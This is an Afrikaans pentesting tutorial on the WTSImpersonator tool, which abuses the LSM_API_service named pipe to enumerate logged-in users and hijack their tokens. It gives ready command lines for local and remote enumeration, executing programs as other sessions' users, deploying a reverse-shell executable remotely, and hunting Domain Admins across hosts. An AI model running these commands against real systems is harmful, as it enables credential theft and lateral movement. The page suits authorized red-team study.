WTS Impersonator

Die WTS Impersonator hulpmiddel benut die "\pipe\LSM_API_service" RPC Named pipe om stilweg ingelogde gebruikers te tel en hul tokens te kapen, terwyl dit tradisionele Token Impersonation tegnieke omseil. Hierdie benadering fasiliteer naatlose laterale bewegings binne netwerke. Die innovasie agter hierdie tegniek word toegeskryf aan Omri Baso, wie se werk beskikbaar is op GitHub.

Kernfunksionaliteit

Die hulpmiddel werk deur 'n reeks API-oproepe:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Sleutelmodules en Gebruik

• Opname van Gebruikers: Plaaslike en afstandlike gebruiker opname is moontlik met die hulpmiddel, met opdragte vir enige van die scenario's:

• Plaaslik:

.\WTSImpersonator.exe -m enum

• Afstandlik, deur 'n IP-adres of gasheernaam te spesifiseer:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Uitvoering van Opdragte: Die exec en exec-remote modules vereis 'n Diens konteks om te funksioneer. Plaaslike uitvoering benodig eenvoudig die WTSImpersonator uitvoerbare lêer en 'n opdrag:

• Voorbeeld vir plaaslike opdrag uitvoering:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe kan gebruik word om 'n diens konteks te verkry:

.\PsExec64.exe -accepteula -s cmd.exe

• Afstandlike Opdrag Uitvoering: Betrek die skep en installering van 'n diens afstandlik soortgelyk aan PsExec.exe, wat uitvoering met toepaslike regte toelaat.

• Voorbeeld van afstandlike uitvoering:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Gebruiker Jag Module: Teiken spesifieke gebruikers oor verskeie masjiene, wat kode onder hul kredensiale uitvoer. Dit is veral nuttig om Domein Administrators met plaaslike administratiewe regte op verskeie stelsels te teiken.

• Gebruik voorbeeld:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe